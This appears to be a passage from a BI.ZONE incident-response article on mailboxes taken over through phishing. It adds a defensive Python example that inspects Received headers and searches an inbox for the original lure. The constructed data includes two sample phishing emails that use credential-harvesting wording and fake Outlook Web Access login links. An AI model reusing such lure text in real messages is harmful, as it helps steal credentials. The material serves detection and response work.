In such situations, we usually suspect that there is malware on the user's PC or that cybercriminals have infiltrated the company's network. However, things are usually much simpler. Typically, the situation unfolds as follows: an employee receives a phishing email, follows the link to a fake page mimicking a mail service interface (e.g. Outlook Web Access or Gmail) and enters their login and password. If the mail service is accessible from the Internet, these credentials are enough for the attackers to log in to the victim's mailbox and start sending phishing messages from it, without any PC being infected with malware.

Our practice shows that heads of cybersecurity departments are prone to over-react to such incidents. Some companies, for example, initiated a large-scale scan of all systems at once, which wasted a lot of resources and time.
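Two checks settle this scenario quickly, shown below as an added example that is not code from the BI.ZONE report. First, the `Received` header written by the organisation's own server tells whether the outgoing phishing messages came in over an authenticated submission session (Postfix writes `ESMTPSA` for that), which points to stolen credentials rather than spoofing or malware. Second, the same user's inbox is searched for the message that carried the fake Outlook Web Access link in the first place. The messages, the server name `mail.corp.example`, the addresses and the lure URL are all constructed; the `Received` header syntax follows what Postfix writes, but the parsing is a deliberately simple regex, not a full RFC 5321 trace parser.

```python
"""Credential-compromise check on the Received chain, and an inbox search for
the original lure (added example, constructed data)."""
import email
import re
from email import policy
from urllib.parse import urlparse

OUR_MTA = "mail.corp.example"                       # assumed name of our own server
LURE_HOST = "owa-corp-example.webmail-login.example"  # constructed fake OWA host

# One of the outgoing phishing messages. The first hop was accepted by our own
# server over an authenticated session (ESMTPSA), i.e. with the user's password.
OUTGOING_PHISH = b"""Received: from [198.51.100.23] (unknown [198.51.100.23])
\tby mail.corp.example (Postfix) with ESMTPSA id 4F2C1A3
\tfor <colleague@corp.example>; Mon, 3 Jun 2019 09:12:44 +0300
From: Ivan Petrov <i.petrov@corp.example>
To: colleague@corp.example
Subject: Mailbox quota exceeded
Content-Type: text/plain

Your mailbox is full. Sign in to release space:
https://owa-corp-example.webmail-login.example/owa/auth/logon.aspx
"""

# The same user's inbox: the original lure (unauthenticated inbound mail) and
# an unrelated benign message.
INBOX = [
    b"""Received: from mx-out.corp-example-support.example (mx-out.corp-example-support.example [192.0.2.10])
\tby mail.corp.example (Postfix) with ESMTPS id 1A9B77
\tfor <i.petrov@corp.example>; Fri, 31 May 2019 17:40:02 +0300
From: IT Helpdesk <helpdesk@corp-example-support.example>
To: i.petrov@corp.example
Subject: Action required: verify your mailbox
Content-Type: text/plain

Your Outlook Web Access password expires today. Verify it here:
https://owa-corp-example.webmail-login.example/owa/auth/logon.aspx
""",
    b"""From: Anna Smirnova <a.smirnova@corp.example>
To: i.petrov@corp.example
Subject: Lunch?
Content-Type: text/plain

Canteen at 13:00? Menu: https://www.example.org/menu
""",
]

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def submitted_via_our_mta(raw: bytes, our_mta: str = OUR_MTA) -> dict:
    """Look at the first hop (last Received header) and report who accepted
    the message and whether the session was authenticated."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    received = msg.get_all("Received") or []
    first_hop = " ".join(str(received[-1]).split()) if received else ""
    by = re.search(r"\bby\s+([\w.-]+)", first_hop)
    by_host = by.group(1).lower() if by else ""
    return {
        "first_hop_by": by_host,
        "authenticated": "ESMTPSA" in first_hop or "authenticated" in first_hop.lower(),
        "via_our_mta": by_host == our_mta,
    }


def links_in(msg) -> list:
    body = msg.get_body(preferencelist=("plain", "html"))
    return URL_RE.findall(body.get_content()) if body else []


def lure_host_of(raw: bytes) -> str:
    """Hostname of the first link in the message body, or ''."""
    links = links_in(email.message_from_bytes(raw, policy=policy.default))
    return (urlparse(links[0]).hostname or "") if links else ""


def find_lures(mailbox: list, lure_host: str) -> list:
    """Messages in the mailbox whose links point at the fake OWA host."""
    found = []
    for raw in mailbox:
        msg = email.message_from_bytes(raw, policy=policy.default)
        if lure_host in {urlparse(u).hostname for u in links_in(msg)}:
            found.append({"from": str(msg["From"]), "subject": str(msg["Subject"])})
    return found


if __name__ == "__main__":
    print(submitted_via_our_mta(OUTGOING_PHISH))
    print(find_lures(INBOX, lure_host_of(OUTGOING_PHISH)))
```

Once the lure is found, the scope is known without scanning anything: reset the user's password, revoke active sessions, block the lure host at the proxy and search other mailboxes for the same URL. Imaging the mail server or sweeping every workstation is only warranted if this check comes back negative.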
1. Delete the home directory of the user from the system
Scan the system with an antivirus
Isolate the user's PC from the rest of the network
Send the malicious attachment for analysis
Strategic partner of the INTERPOL Cybercrime Programme.
Expert member of the World Economic Forum Centre for Cybersecurity.
Certified member of the Council for Registered Ethical Security Testers.
Cybersecurity services provider recommended by SWIFT in 79 countries.
BI.ZONE-CERT is a full member of the FIRST association of computer security incident response teams.